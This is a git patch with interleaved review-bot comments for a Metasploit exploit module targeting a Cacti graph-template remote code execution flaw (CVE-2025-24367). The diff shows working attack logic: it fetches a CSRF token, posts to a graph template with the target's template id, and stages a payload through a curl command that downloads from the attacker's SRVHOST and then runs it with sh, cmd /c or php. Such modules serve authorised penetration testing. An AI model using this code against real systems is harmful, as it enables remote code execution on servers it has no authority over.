From b6da204725bb35ddbccbd7b82004b1dc383dc8cb Mon Sep 17 00:00:00 2001
From: jheysel-r7
Date: Wed, 21 Jan 2026 10:09:12 -0800
Subject: [PATCH] Apply suggestions from code review
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
---
.../multi/http/cacti_graph_template_rce.md | 2 +-
.../multi/http/cacti_graph_template_rce.rb | 41 ++++++++-----------
2 files changed, 17 insertions(+), 26 deletions(-)
diff --git a/documentation/modules/exploit/multi/http/cacti_graph_template_rce.md b/documentation/modules/exploit/multi/http/cacti_graph_template_rce.md
index 82f220251a..eafd0f00e9 100644
--- a/documentation/modules/exploit/multi/http/cacti_graph_template_rce.md
+++ b/documentation/modules/exploit/multi/http/cacti_graph_template_rce.md
@@ -106,7 +106,7 @@ $cacti_db_session = false; $disable_log_rotation = false; ``` - Run `docker-compose up` -- Access http://127.0.0.1:8080 +- Access http://127.0.0.1:8080/cacti - Login with the `admin` user (password: `admin`) - Follow the installation steps (accept every default settings and ignore the pre-installation checks suggestions)
diff --git a/modules/exploits/multi/http/cacti_graph_template_rce.rb b/modules/exploits/multi/http/cacti_graph_template_rce.rb
index b81777313d..64b8c5028f 100644
--- a/modules/exploits/multi/http/cacti_graph_template_rce.rb
+++ b/modules/exploits/multi/http/cacti_graph_template_rce.rb
@@ -42,29 +42,24 @@ class MetasploitModule < Msf::Exploit::Remote [ 'URL', 'https://github.com/Cacti/cacti/security/advisories/GHSA-fxrq-fr7h-9rqq'], [ 'CVE', '2025-24367'], ], - 'Platform' => %w[unix linux php], 'Privileged' => false, - 'Arch' => [ARCH_PHP, ARCH_CMD], 'Targets' => [ [ - 'Linux Command', + 'Linux', { - 'Arch' => ARCH_CMD, - 'Platform' => [ 'unix', 'linux' ] + 'Arch' => [ARCH_CMD, ARCH_PHP], + 'Platform' => [ 'unix', 'linux', 'php' ], + # The graph template id 226 corresponds to "Linux - Logged on users" + 'TemplateId' => 226 } ], [ - 'PHP', + 'Windows', { - 'Arch' => ARCH_PHP, - 'Platform' => 'php' - } - ], - [ - 'Windows Command', - { - 'Arch' => ARCH_CMD, - 'Platform' => 'win' + 'Arch' => [ARCH_CMD, ARCH_PHP], + 'Platform' => [ 'win', 'php' ], + # The graph template id 197 corresponds to "Host MIB - Logged in Users" + 'TemplateId' => 197 } ] ], @@ -86,10 +81,6 @@ class MetasploitModule < Msf::Exploit::Remote OptString.new('USERNAME', [ true, 'User to login with', 'admin']), OptString.new('PASSWORD', [ true, 'Password to login with', 'admin']), OptString.new('TARGETURI', [ true, 'The base URI of Cacti', '/cacti']), - # Allow the operator to define the TEMPLATE_ID for when they're exploiting the PHP target. - # The graph template id 226 corresponds to "Linux - Logged on users", where 197 is "Host MIB - Logged in Users" - # Both of those templates correspond to local_graph_id=3 on a default Cacti installation for both Window and Linux. - OptInt.new('TEMPLATE_ID', [ true, 'The graph template ID to modify. If exploiting a Linux target set to 226, if Windows set to 197' ]) ] ) end 
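Review bot: The two new `TemplateId` comments in the `Targets` entries state the id-to-name mapping without qualification, whereas the `TEMPLATE_ID` option comment removed in the @@ -86 hunk described these values in terms of a default Cacti installation. With the operator override gone, that qualifier is the only hint that a customised install may hold a different template under 226 or 197, in which case the module would edit an unrelated template on the system under test. I would keep the caveat in the comment, e.g. `# Graph template id 226 is "Linux - Logged on users" on a default Cacti installation`, and the same wording for 197.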
@@ -133,7 +124,7 @@ class MetasploitModule < Msf::Exploit::Remote end def csrf_magic_token - template_url = normalize_uri(target_uri.path, '/graph_templates.php?action=template_edit&id=' + datastore['TEMPLATE_ID'].to_s) + template_url = normalize_uri(target_uri.path, '/graph_templates.php?action=template_edit&id=' + target['TemplateId'].to_s) res = send_request_cgi({ 'uri' => template_url, 'method' => 'GET', @@ -166,8 +157,8 @@ class MetasploitModule < Msf::Exploit::Remote data = { '__csrf_magic' => csrf_magic, 'name' => 'Host MIB - Logged in Users', - 'graph_template_id' => datastore['TEMPLATE_ID'], - 'graph_template_graph_id' => datastore['TEMPLATE_ID'], + 'graph_template_id' => target['TemplateId'], + 'graph_template_graph_id' => target['TemplateId'], 'save_component_template' => '1', 'title' => '|host_description| - Logged in Users', 'vertical_label' => 'percent', @@ -298,11 +289,10 @@ class MetasploitModule < Msf::Exploit::Remote authenticate hosted_payload_name = Rex::Text.rand_text_alpha_lower(1) start_service('Path' => "/#{hosted_payload_name}") - if target.arch.first == ARCH_CMD - if target['Platform'] == 'win' + if payload.arch.first == ARCH_CMD + if target.name == 'Windows' on_disk_payload_name = "#{Rex::Text.rand_text_alpha_lower(1)}.bat" execute_payload_command = "cmd\\x20/c\\x20#{on_disk_payload_name}" - print_status("win command #{execute_payload_command}") else on_disk_payload_name = Rex::Text.rand_text_alpha_lower(1) execute_payload_command = "sh\\x20#{on_disk_payload_name}" @@ -311,6 +301,7 @@ class MetasploitModule < Msf::Exploit::Remote on_disk_payload_name = "#{Rex::Text.rand_text_alpha_lower(1)}.php" execute_payload_command = "php\\x20#{on_disk_payload_name}" end + vprint_status("Payload execution command: #{execute_payload_command}") upload_payload_command = "curl\\x20#{datastore['SRVHOST']}\\x3a#{datastore['SRVPORT']}/#{hosted_payload_name}\\x20-o\\x20#{on_disk_payload_name}" upload_stage(upload_payload_command)
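Review bot: In `csrf_magic_token` (@@ -133 hunk) the query string is still glued onto the path with `+` and `.to_s` and then handed to `normalize_uri`, which is meant for path segments rather than query strings. `send_request_cgi` accepts query parameters separately and encodes them, so I would pass `'uri' => normalize_uri(target_uri.path, 'graph_templates.php')` together with `'vars_get' => { 'action' => 'template_edit', 'id' => target['TemplateId'] }`. The rest of the method lies outside this hunk.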
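Review bot: In the @@ -166 hunk the form keeps the fixed `'name' => 'Host MIB - Logged in Users'` while `graph_template_id` now follows the selected target, so with the Linux target (id 226, commented as "Linux - Logged on users") the request would save that template under the Windows template's name on the tested host. I would add a per-target key beside `TemplateId`, for example `'TemplateName' => 'Linux - Logged on users'`, and post `'name' => target['TemplateName']`. Whether the template is restored afterwards is not visible from here, so the configuration change should also be stated in the module's documented side effects. The enclosing method starts and ends outside the hunk.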
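Review bot: `target.name == 'Windows'` in the @@ -298 hunk ties the branch to the display string of the target defined in the `Targets` list, so a later rename of that entry would silently route Windows hosts into the `sh` branch. The target options already carry the platform list, so the check could read `if target['Platform'].include?('win')`, which stays correct if the label changes. The enclosing method begins and ends outside the hunk.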